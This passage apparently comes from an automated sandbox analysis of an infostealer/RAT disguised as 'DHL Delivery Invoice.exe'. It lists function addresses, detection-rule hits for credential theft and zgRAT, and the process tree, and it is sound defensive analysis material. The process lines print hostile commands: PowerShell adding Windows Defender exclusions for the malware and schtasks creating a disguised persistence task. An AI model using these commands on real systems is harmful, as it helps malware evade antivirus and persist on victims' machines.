                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_02E62C9410_2_02E62C94
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_02E64C9810_2_02E64C98
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_02E6055010_2_02E60550
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_0304269010_2_03042690
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_030497E010_2_030497E0
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_0304354010_2_03043540
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_0304140810_2_03041408
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_03041C9810_2_03041C98
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_0304214810_2_03042148
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_0304087010_2_03040870
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_03044FE010_2_03044FE0
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_03044FF010_2_03044FF0
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_030413DE10_2_030413DE
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_030456E810_2_030456E8
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_030456F810_2_030456F8
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_0304350D10_2_0304350D
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_0304345F10_2_0304345F
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_03045AE810_2_03045AE8
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_03045AF810_2_03045AF8
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_030458A010_2_030458A0
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_030458B010_2_030458B0
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_07F657DC10_2_07F657DC
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_07F657D610_2_07F657D6
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_07F6762810_2_07F67628
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_086A2E5810_2_086A2E58
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_086A932010_2_086A9320
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_086A2AE610_2_086A2AE6
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_086A2B6010_2_086A2B60
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_086A2B7010_2_086A2B70
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_086A2DF810_2_086A2DF8
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_086A2E4C10_2_086A2E4C
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_086A2E5710_2_086A2E57
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_086ADF0810_2_086ADF08
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_086AE34010_2_086AE340
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 10_2_086AA4E010_2_086AA4E0
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_030941C814_2_030941C8
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_03094A9814_2_03094A98
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_03093E8014_2_03093E80
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_0309AD4A14_2_0309AD4A
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE664814_2_06CE6648
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE562814_2_06CE5628
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE7DD814_2_06CE7DD8
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CEB28314_2_06CEB283
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE30E014_2_06CE30E0
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CEC1E814_2_06CEC1E8
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE76F814_2_06CE76F8
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE240814_2_06CE2408
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CEE40014_2_06CEE400
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE5D3B14_2_06CE5D3B
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE004014_2_06CE0040
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeCode function: 14_2_06CE000614_2_06CE0006
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002DFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedf8fc031-c024-49b7-9cf2-cdfecdf01d4a.exe4 vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1824455417.0000000000D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1843513866.00000000079A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedf8fc031-c024-49b7-9cf2-cdfecdf01d4a.exe4 vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1850359008.0000000009D70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1824455417.0000000000DB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000000.1788290888.0000000000796000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSLRd.exe, vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1828601395.0000000004318000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exe, 00000009.00000002.4255194280.00000000008F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exeBinary or memory string: OriginalFilenameSLRd.exe, vs DHL Delivery Invoice.exe
                      Source: DHL Delivery Invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 14.2.LIWBHGsz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.LIWBHGsz.exe.4909990.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.LIWBHGsz.exe.4909990.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.LIWBHGsz.exe.4b6ace8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.LIWBHGsz.exe.4b6ace8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: DHL Delivery Invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: LIWBHGsz.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.DHL Delivery Invoice.exe.4335828.4.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.DHL Delivery Invoice.exe.79a0000.5.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, nW3n9DtCUKVoFXJXYL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, nW3n9DtCUKVoFXJXYL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, nW3n9DtCUKVoFXJXYL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, T4MYihU2jTbHZyP9hj.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@2/2
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeFile created: C:\Users\user\AppData\Roaming\LIWBHGsz.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2520:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3328:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1508:120:WilError_03
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC314.tmpJump to behavior
                      Source: DHL Delivery Invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: DHL Delivery Invoice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[adUsers] SET [samAccountName] = @samAccountName, [_dn] = @_dn, [phoneCorp] = @phoneCorp, [phoneMobile] = @phoneMobile, [IpPhone] = @IpPhone, [key_card] = @key_card WHERE (([id] = @Original_id) AND ([samAccountName] = @Original_samAccountName) AND ([_dn] = @Original__dn) AND ((@IsNull_phoneCorp = 1 AND [phoneCorp] IS NULL) OR ([phoneCorp] = @Original_phoneCorp)) AND ((@IsNull_phoneMobile = 1 AND [phoneMobile] IS NULL) OR ([phoneMobile] = @Original_phoneMobile)) AND ((@IsNull_IpPhone = 1 AND [IpPhone] IS NULL) OR ([IpPhone] = @Original_IpPhone)) AND ((@IsNull_key_card = 1 AND [key_card] IS NULL) OR ([key_card] = @Original_key_card)));
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[adUsers] ([samAccountName], [_dn], [phoneCorp], [phoneMobile], [IpPhone], [key_card]) VALUES (@samAccountName, @_dn, @phoneCorp, @phoneMobile, @IpPhone, @key_card);
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Employee_photo] SET [Id] = @Id, [SerialNumber] = @SerialNumber, [ePhoto] = @ePhoto, [ePath] = @ePath, [id_empl] = @id_empl WHERE (([id_photo] = @Original_id_photo) AND ([Id] = @Original_Id) AND ((@IsNull_SerialNumber = 1 AND [SerialNumber] IS NULL) OR ([SerialNumber] = @Original_SerialNumber)) AND ((@IsNull_ePath = 1 AND [ePath] IS NULL) OR ([ePath] = @Original_ePath)) AND ([id_empl] = @Original_id_empl));
                      Source: DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[Employee_photo] ([Id], [SerialNumber], [ePhoto], [ePath], [id_empl]) VALUES (@Id, @SerialNumber, @ePhoto, @ePath, @id_empl);
                      Source: DHL Delivery Invoice.exeReversingLabs: Detection: 52%
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeFile read: C:\Users\user\Desktop\DHL Delivery Invoice.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\DHL Delivery Invoice.exe "C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Users\user\Desktop\DHL Delivery Invoice.exe "C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Users\user\Desktop\DHL Delivery Invoice.exe "C:\Users\user\Desktop\DHL Delivery Invoice.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\LIWBHGsz.exe C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess created: C:\Users\user\AppData\Roaming\LIWBHGsz.exe "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Delivery Invoice.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Users\user\Desktop\DHL Delivery Invoice.exe "C:\Users\user\Desktop\DHL Delivery Invoice.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Users\user\Desktop\DHL Delivery Invoice.exe "C:\Users\user\Desktop\DHL Delivery Invoice.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp"
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess created: C:\Users\user\AppData\Roaming\LIWBHGsz.exe "C:\Users\user\AppData\Roaming\LIWBHGsz.exe"
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeSection loaded: mscoree.dllJump to behavior
